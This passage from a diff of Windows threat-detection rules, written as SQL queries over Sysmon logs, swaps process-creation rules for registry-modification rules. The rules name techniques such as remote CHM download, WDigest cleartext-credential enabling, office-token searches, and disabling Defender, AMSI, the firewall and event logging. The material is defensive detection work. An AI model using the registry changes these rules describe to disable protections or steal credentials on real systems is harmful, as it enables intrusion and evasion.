'%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_rdrleakdiag.yml" + "filename": "registry_set_dhcp_calloutdll.yml" }, { - "title": "Remote CHM File Download/Execution Via HH.EXE", - "id": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", + "title": "Disable Windows Firewall by Registry", + "id": "e78c408a-e2ea-43cd-b5ea-51975cf358c0", "status": "experimental", - "description": "Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect set EnableFirewall to 0 to disable the windows firewall", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.001" + "attack.t1562.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'HH.exe' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '% http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\StandardProfile\\\\EnableFirewall' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\DomainProfile\\\\EnableFirewall' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_hh_chm_remote_download_or_execution.yml" + "filename": "registry_set_disable_windows_firewall.yml" }, { - "title": "Suspicious Regsvr32 Execution From Remote Share", - "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "title": "Potential EventLog File Location Tampering", + "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", "status": "experimental", - "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", - "author": "Nasreddine Bencherchali (Nextron Systems)", + 
"description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting", + "author": "D3F7A5105", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT (Details LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_remote_share.yml" + "filename": "registry_set_evtx_file_key_tamper.yml" }, { - "title": "Use of Squirrel.exe", - "id": "45239e6a-b035-4aaf-b339-8ad379fcb67e", + "title": "COM Hijacking via TreatAs", + "id": "dc5c24af-6995-49b2-86eb-a9ff62199e82", "status": "experimental", - "description": "Detects the usage of the \"Squirrel.exe\" binary as a LOLBIN. 
This binary is part of multiple software installations (Slack, Teams, Discord, etc.)", - "author": "Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community", + "description": "Detect modification of TreatAs key to enable \"rundll32.exe -sta\" command", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Expected FP with some electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop,...Etc)" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\squirrel.exe' ESCAPE '\\' OR Image LIKE '%\\\\update.exe' ESCAPE '\\') AND (((CommandLine LIKE '% --download %' ESCAPE '\\' OR CommandLine LIKE '% --update %' ESCAPE '\\' OR CommandLine LIKE '% --updateRollback=%' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '% --processStart%' ESCAPE '\\' AND CommandLine LIKE '%Discord.exe%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%GitHubDesktop.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--createShortcut%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Teams.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' 
ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Yammer.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%TreatAs\\\\(Default)' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_squirrel.yml" + "filename": "registry_set_treatas_persistence.yml" }, { - "title": "Copy From VolumeShadowCopy Via Cmd.EXE", - "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", - "status": "experimental", - "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "Wdigest Enable UseLogonCredential", + "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "status": "test", + "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.impact", - "attack.t1490" + 
"attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Backup scenarios using the commandline" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_cmd_shadowcopy_access.yml" + "filename": "registry_set_wdigest_enable_uselogoncredential.yml" }, { - "title": "Use of Setres.exe", - "id": "835e75bf-4bfd-47a4-b8a6-b766cac8bcb7", - "status": "experimental", - "description": "Detects the use of Setres.exe to set the screen resolution and then potentially launch a file named \"choice\" (with any executable extension such as \".cmd\" or \".exe\") from the current execution path", - "author": "@gott_cyber", + "title": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", + "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", + "status": "test", + "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", + "author": "EagleEye Team, Florian Roth (Nextron Systems), NVISO", "tags": [ + "attack.persistence", + "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1112" ], "falsepositives": [ - "Legitimate usage of Setres" + "New printer port install on host" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\setres.exe' ESCAPE '\\' AND Image LIKE '%\\\\choice' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Ports%' ESCAPE '\\' AND (Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.com%' ESCAPE '\\' OR Details LIKE '%C:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_setres.yml" + "filename": "registry_set_cve_2020_1048_new_printer_port.yml" }, { - "title": "Suspicious Office Token Search Via CLI", - "id": "6d3a3952-6530-44a3-8554-cf17c116c615", - "status": "experimental", - "description": "Detects possible search for office tokens via CLI by looking for the string \"eyJ0eX\". This string is used as an anchor to look for the start of the JWT token used by office and similar apps.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Session Manager Autorun Keys Modification", + "id": "046218bd-e0d8-4113-a3c3-895a12b2b298", + "status": "test", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.persistence", + "attack.t1547.001", + "attack.t1546.009" ], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%eyJ0eXAiOi%' ESCAPE '\\' OR CommandLine LIKE '% eyJ0eX%' ESCAPE '\\' OR CommandLine LIKE '% \"eyJ0eX\"%' ESCAPE '\\' OR CommandLine LIKE '% ''eyJ0eX''%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Session Manager%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\SetupExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\S0InitialCommand%' ESCAPE '\\' OR TargetObject LIKE '%\\\\KnownDlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Execute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootExecute%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppCertDlls%' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" ], - "filename": "proc_creation_win_susp_office_token_search.yml" + "filename": "registry_set_asep_reg_keys_modification_session_manager.yml" }, { - "title": "Remote Access Tool - AnyDesk Piped Password Via CLI", - "id": "b1377339-fda6-477a-b455-ac0923f9ec2c", + "title": "CurrentControlSet Autorun Keys Modification", + "id": "f674e36a-4b91-431e-8aef-f8a96c2aca35", "status": "experimental", - "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate piping of the password to anydesk", - "Some FP could occur with similar tools that uses the same command line '--set-password'" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%/c %' ESCAPE '\\' AND CommandLine LIKE '%echo %' ESCAPE '\\' AND CommandLine LIKE 
'%.exe --set-password%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SecurityProviders\\\\SecurityProviders%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Providers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Print\\\\Monitors%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NetworkProvider\\\\Order%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Notification Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Lsa\\\\Authentication Packages%' ESCAPE '\\' OR TargetObject LIKE '%\\\\BootVerificationProgram\\\\ImagePath%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\CutePDF Writer Monitor%' ESCAPE '\\' AND (Details LIKE 'cpwmon64\\_v40.dll' ESCAPE '\\' OR Details LIKE 'CutePDF Writer' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%Print\\\\Monitors\\\\Appmon\\\\Ports\\\\Microsoft.Office.OneNote\\_%' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider\\\\Order\\\\ProviderOrder' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\spoolsv.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Print\\\\Monitors\\\\MONVNC\\\\Driver' ESCAPE '\\' AND Details = 'VNCpm.dll')))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml" + "filename": 
"registry_set_asep_reg_keys_modification_currentcontrolset.yml" }, { - "title": "Suspicious IIS URL GlobalRules Rewrite Via AppCmd", - "id": "7c8af9b2-dcae-41a2-a9db-b28c288b5f08", + "title": "UAC Bypass via Event Viewer - Registry Set", + "id": "7c81fec3-1c1d-43b0-996a-46753041b1b6", "status": "experimental", - "description": "Detects usage of \"appcmd\" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects UAC bypass method using Windows event viewer", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ - "Legitimate usage of appcmd to add new URL rewrite rules" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:system.webServer/rewrite/globalRules%' ESCAPE '\\' AND CommandLine LIKE '%commit:%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\mscfile\\\\shell\\\\open\\\\command' ESCAPE '\\')" ], - "filename": "proc_creation_win_iis_appcmd_susp_rewrite_rule.yml" + "filename": "registry_set_uac_bypass_eventvwr.yml" }, { - "title": "Fsutil Suspicious Invocation", - "id": "add64136-62e5-48ea-807e-88638d02df1e", - "status": "stable", - "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the 
attack (seen by NotPetya and others).\n", - "author": "Ecco, E.M. Anhaus, oscd.community", + "title": "Disable Exploit Guard Network Protection on Windows Defender", + "id": "bf9e1387-b040-4393-9851-1598f8ecfae9", + "status": "experimental", + "description": "Detects disabling Windows Defender Exploit Guard Network Protection", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1070" + "attack.t1562.001" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender Security Center\\\\App and Browser protection\\\\DisallowExploitProtectionOverride%' ESCAPE '\\' AND Details = 'DWORD (00000001)')" ], - "filename": "proc_creation_win_fsutil_usage.yml" + "filename": "registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" }, { - "title": "Mustang Panda Dropper", - "id": "2d87d610-d760-45ee-a7e6-7a6f2a65de00", - "status": "test", - "description": "Detects specific process parameters as used by Mustang Panda droppers", - "author": "Florian Roth (Nextron Systems), oscd.community", + "title": "Disable Tamper Protection on Windows Defender", + "id": "93d298a1-d28f-47f1-a468-d971e7796679", + "status": "experimental", + "description": "Detects disabling Windows Defender Tamper Protection", + "author": "Austin Songer @austinsonger", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.defense_evasion", + 
"attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Temp\\\\wtask.exe /create%' ESCAPE '\\' OR CommandLine LIKE '%\\%windir:~-3,1\\%\\%PUBLIC:~-9,1\\%%' ESCAPE '\\' OR CommandLine LIKE '%/tn \"Security Script %' ESCAPE '\\' OR CommandLine LIKE '%\\%windir:~-1,1\\%%' ESCAPE '\\') OR (CommandLine LIKE '%/E:vbscript%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\' AND CommandLine LIKE '%/F%' ESCAPE '\\') OR Image LIKE '%Temp\\\\winwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Features\\\\TamperProtection%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_mustangpanda.yml" + "filename": "registry_set_disabled_tamper_protection_on_microsoft_defender.yml" }, { - "title": "Fake Instance Of Hxtsr.exe", - "id": "4e762605-34a8-406d-b72e-c1a089313320", + "title": "Suspicious Service Installed", + "id": "f2485272-a156-4773-82d7-1d178bc4905b", "status": "test", - "description": "HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.\nHxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\".\nIts path includes a version number, e.g., \"C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\\HxTsr.exe\".\nAny instances of hxtsr.exe not in this folder may 
be malware camouflaging itself as HxTsr.exe\n", - "author": "Sreeman", + "description": "Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\n", + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.t1562.001", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image = 'hxtsr.exe' AND NOT (CurrentDirectory LIKE 'C:\\\\program files\\\\windowsapps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND CurrentDirectory LIKE '%\\\\hxtsr.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\NalDrv\\\\ImagePath' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PROCEXP152\\\\ImagePath' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\') AND Details LIKE '%\\\\WINDOWS\\\\system32\\\\Drivers\\\\PROCEXP152.SYS%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hxtsr_masquerading.yml" + "filename": "registry_set_susp_service_installed.yml" }, { - "title": "Computer Discovery And Export Via Get-ADComputer Cmdlet", - "id": 
"435e10e4-992a-4281-96f3-38b11106adde", + "title": "Potential AMSI COM Server Hijacking", + "id": "160d2780-31f7-4922-8b3a-efce30e63e96", "status": "experimental", - "description": "Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file", + "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%Get-ADComputer %' ESCAPE '\\' AND CommandLine LIKE '% -Filter \\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" ], - "filename": 
"proc_creation_win_powershell_computer_discovery_get_adcomputer.yml" + "filename": "registry_set_amsi_com_hijack.yml" }, { - "title": "Renamed FTP.EXE Execution", - "id": "277a4393-446c-449a-b0ed-7fdc7795244c", + "title": "Blackbyte Ransomware Registry", + "id": "83314318-052a-4c90-a1ad-660ece38d276", "status": "test", - "description": "Detects the execution of a renamed \"ftp.exe\" binary based on the PE metadata fields", - "author": "Victor Sergeev, oscd.community", + "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059", "attack.defense_evasion", - "attack.t1202" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'ftp.exe' AND NOT (Image LIKE '%\\\\ftp.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_renamed_ftp.yml" + "filename": "registry_set_blackbyte_ransomware.yml" }, { - "title": "Firewall Rule Deleted Via Netsh.EXE", - "id": "1a5fefe6-734f-452e-a07d-fc1c35bce4b2", + "title": "Disable Windows Event Logging Via Registry", + "id": "2f78da12-f7c7-430b-8b19-a28f269b77a3", "status": "experimental", - "description": "Detects the removal of a port or 
application rule in the Windows Firewall configuration using netsh", - "author": "frack113", + "description": "Detects tampering with the \"Enabled\" registry key in order to disable windows logging of a windows event channel", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1562.002" ], "falsepositives": [ - "Legitimate administration activity", - "Software installations and removal" + "Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%delete %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND CommandLine LIKE '%name=Dropbox%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Enabled' ESCAPE '\\' AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE '%\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' 